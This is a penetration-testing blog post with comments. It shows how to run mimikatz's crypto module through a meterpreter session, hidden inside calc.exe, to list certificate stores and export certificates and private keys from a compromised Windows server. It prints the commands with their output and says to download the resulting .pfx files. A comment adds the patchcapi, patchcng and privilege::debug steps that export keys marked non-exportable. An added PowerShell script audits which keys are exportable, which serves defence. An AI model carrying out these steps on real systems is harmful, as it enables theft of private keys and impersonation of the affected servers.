So we all know that mimikatz dumps hashes and plaintext passwords from memory, which is fantastic.
But now that it runs in memory, you can do a lot more with it. Below are the various modules (mimikatz 1.0 lists them in French; translated here):
standard - base commands
crypto - cryptography and certificates
sekurlsa - dump of Windows hashes and passwords
system - system management
process - process manipulation
thread - thread manipulation
service - service manipulation
privilege - privilege manipulation
winmine - manipulation of the Windows XP Minesweeper (demonstration)
minesweeper - manipulation of the Windows Vista and 7 Minesweeper (demonstration)
nogpo - to bypass a few trivial GPOs
samdump - offline SAM dump
inject - library injector
ts - Terminal Server manipulation
divers - miscellaneous functions too small to stand on their own
The crypto module does some interesting things. I briefly talked about stealing certificates at DerbyCon; the crypto module is what makes that practical. First use
crypto::listkeys, crypto::listProviders, crypto::listStores, crypto::listCertificates
to identify the stores, providers and certificates on the host that you want for yourself, then
crypto::exportKeys and crypto::exportCertificates
to take them home. listCertificates tells you, per certificate, which key container and provider hold the private key and whether that key is marked exportable; a plain exportCertificates will only pull the ones marked exportable.
It looks like this:
meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listStores" exit'
Process 9904 created.
Channel 20 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 8 2012 15:18:27) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # crypto::listStores
Location : 'CERT_SYSTEM_STORE_CURRENT_USER'
My
Root
Trust
CA
TrustedPublisher
Disallowed
AuthRoot
TrustedPeople
ADDRESSBOOK
mimikatz(commandline) # exit
execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My" exit'
Process 3472 created.
Channel 12 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My
Location : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
- sqlapps01
Key container : SELFSSL
Provider : Microsoft RSA SChannel Cryptographic Provider
Type : AT_KEYEXCHANGE
Exportable : YES
Key size : 1024
mimikatz(commandline) # exit
execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" exit'
Process 6112 created.
Channel 23 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE
Location : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
- MACHINENAME
Key container : SELFSSL
Provider : Microsoft RSA SChannel Cryptographic Provider
Type : AT_KEYEXCHANGE
Exportable : YES
Key size : 1024
Private export to 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_MACHINENAME.pfx' : OK
Public export to 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_MACHINENAME.der' : OK
mimikatz(commandline) # exit
Once exported, download the .pfx (certificate plus private key) and .der (public certificate) files from the target; they are written to the working directory of the process you ran mimikatz from.
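For anyone who wants to see the same picture from the host side, before reaching for mimikatz or when auditing a server for keys that would walk out this way, here is an added PowerShell example (not part of the original post and not mimikatz code). It walks a certificate store and reports, for each certificate that has a private key, the fields crypto::listCertificates prints: key container, provider, key spec, key size and whether the key is exportable. It covers RSA keys only, which is the case shown above; the store path parameter is an assumption and defaults to the LOCAL_MACHINE\My store the post targets. Run it elevated, otherwise machine keys show up as unreadable.

```powershell
# Added example, not from the original post or from mimikatz.
# Lists a certificate store the way crypto::listCertificates does and reports,
# per certificate with a private key: container, provider, key spec, key size
# and export policy. RSA keys only. Run from an elevated PowerShell so the
# machine key containers can be opened.
param(
    # Assumption: default to the store the post targets (CERT_SYSTEM_STORE_LOCAL_MACHINE\My).
    [string]$StorePath = 'Cert:\LocalMachine\My'
)

$report = foreach ($cert in Get-ChildItem -Path $StorePath) {
    $row = [ordered]@{
        Subject    = $cert.Subject
        Thumbprint = $cert.Thumbprint
        Container  = ''
        Provider   = ''
        KeySpec    = ''
        KeySize    = ''
        Exportable = 'no private key'
    }

    if ($cert.HasPrivateKey) {
        try {
            $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($cert)
            if ($rsa -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
                # Legacy CryptoAPI (CSP) key, like the SELFSSL container under
                # "Microsoft RSA SChannel Cryptographic Provider" in the post.
                $info = $rsa.CspKeyContainerInfo
                $row.Container  = $info.KeyContainerName
                $row.Provider   = $info.ProviderName
                $row.KeySpec    = if ($info.KeyNumber -eq 'Exchange') { 'AT_KEYEXCHANGE' } else { 'AT_SIGNATURE' }
                $row.KeySize    = $rsa.KeySize
                $row.Exportable = if ($info.Exportable) { 'YES (CRYPT_EXPORTABLE)' } else { 'NO' }
            } elseif ($rsa -is [System.Security.Cryptography.RSACng]) {
                # CNG key held by a key storage provider: exportability is a policy bitmask.
                # On PowerShell 7 CSP-backed keys may also surface here via the NCrypt layer.
                $key = $rsa.Key
                $row.Container  = $key.KeyName
                $row.Provider   = $key.Provider.Provider
                $row.KeySpec    = 'CNG'
                $row.KeySize    = $key.KeySize
                $row.Exportable = if ($key.ExportPolicy -eq 'None') { 'NO' } else { "YES ($($key.ExportPolicy))" }
            } else {
                $row.Exportable = 'non-RSA key, not inspected'
            }
        } catch {
            # Usually access denied / "Keyset does not exist": the key exists but this
            # account cannot open the container. Re-run elevated.
            $row.Exportable = "unreadable: $($_.Exception.Message)"
        }
    }
    [pscustomobject]$row
}

$report | Format-Table -AutoSize

# The rows a plain crypto::exportCertificates would pull without any patching.
$report | Where-Object { $_.Exportable -like 'YES*' } |
    Select-Object Subject, Container, Provider, KeySize, Exportable
```

A server with a self-signed SELFSSL key marked exportable, as in the sqlapps01 output above, is the obvious catch; from the defender's seat the fix is to issue server keys as non-exportable (or on a hardware provider) so that an attacker with code execution has to work harder than a single export command.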
3 comments:
Maybe the next mimikatz feature can be Internet-happy English translations
No
:)
btw, don't forget:
- crypto::patchcapi
and/or
- privilege::debug
- crypto::patchcng
it exports the "non-exportable" ones ;)